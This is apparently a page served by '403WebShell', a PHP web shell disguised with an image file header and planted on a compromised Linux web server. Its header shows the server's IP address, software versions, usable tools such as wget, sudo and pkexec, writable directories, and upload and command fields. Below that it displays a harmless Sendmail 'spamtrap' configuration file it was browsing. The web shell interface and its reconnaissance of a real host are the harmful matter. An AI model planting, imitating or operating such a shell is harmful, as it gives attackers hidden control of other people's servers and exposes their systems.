????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.144.28.166
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/sendmail/cf/hack/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/sendmail/cf/hack/spamtrap.m4
divert(-1)dnl
#-----------------------------------------------------------------------------
# $Sendmail: ./spamtrap.m4,v 8.12.0 2001/09/24 12:00:00 cowboy Exp $
#
# hack(spamtrap) config file for building Sendmail
#
# Courtesy of jeff@sdsc.edu (Jeff Makey)
# via c.m.s posting Sat, 8 Sep 2001 07:44:26 +0000 (UTC)
#
# Spamtrap addresses go into the access file like this:
#
# To:spamtrap@pandora.orbl.org	POISON
# To:Friend@public.com		POISON
#
#-----------------------------------------------------------------------------
#
divert(0)dnl
LOCAL_CONFIG
# provide access to macros as a map
Kmacro macro

LOCAL_RULESETS
######################################################################
### spamtrap: handle spamtrap(POISON) users
###
######################################################################
#
# This is not only redundant, but fails with feature(`delay_checks')
#
#SLocal_check_mail
# Clear the "poison recipient" indicator macro for this message.
#R$*				$: $(macro {PoisonRecipient} $) $1

SLocal_check_rcpt
#
# Spamtrap addresses go into the access file like this:
#	To:spamtrap@pandora.orbl.org    POISON
#
# Certain recipients are "poison" and cause the
# message to be rejected for all recipients.
R$*				$: $1 $| $1	create workspace to right of $|
R$* $| $* <$+> $*		$1 $| $3	focus on part in angle brackets
R$* $| $+			$: $1 $| $>SearchList <!To> $| <E:$2> <>
R$* $| <POISON>			$: $1 $| $(macro {PoisonRecipient} $@ POISON $)
R$* $| $*			$: $1		delete workspace

Scheck_eoh
R$*				$: $&{PoisonRecipient}
RPOISON				$#error $@ 5.7.1 $: 550 Mail sent to spam lists is not accepted here

#
# With a "To:Friend@public.com POISON" entry in the access file the
# following ruleset will block certain types of spam too:
#
# Certain To headers are sure-fire spam signatures.
HTo: $>CheckTo
SCheckTo
R$+ , $+			$@ $1 , $2	do not try to verify complex addresses
R$*				$: $1 $| $>SearchList <!To> $| <E:$1> <>
R$* $| <POISON>			$#error $@ 5.7.1 $: 550 Mail sent by spamware is not accepted here
R$* $| $*			$: $1		delete lookup result


Youez - 2016 - github.com/yon3zu
LinuXploit